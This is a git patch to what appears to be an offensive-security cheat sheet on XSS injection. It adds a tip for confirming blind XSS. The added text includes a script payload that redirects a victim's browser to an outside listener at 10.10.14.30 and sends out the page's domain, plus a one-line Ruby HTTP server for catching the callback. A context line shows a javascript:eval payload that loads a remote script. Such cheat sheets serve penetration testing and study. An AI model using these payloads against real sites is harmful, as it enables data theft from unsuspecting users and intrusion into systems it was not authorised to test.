From c469236204861ee8cadc2e546897fef496dff95d Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Wed, 16 Jun 2021 13:25:46 +0200
Subject: [PATCH] XSS: add quick tips for bXSS

---
 XSS Injection/README.md | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 45a49a1..b5fed57 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -453,6 +453,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
 - Comment Box
   - Administrative Panel
 
+### Tips
+
+You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
+
+Eg. payload
+
+```html
+<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
+```
+
+Eg. one-line HTTP server:
+
+```
+$ ruby -run -ehttpd . -p8080
+```
+
 ## Mutated XSS
 
 Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.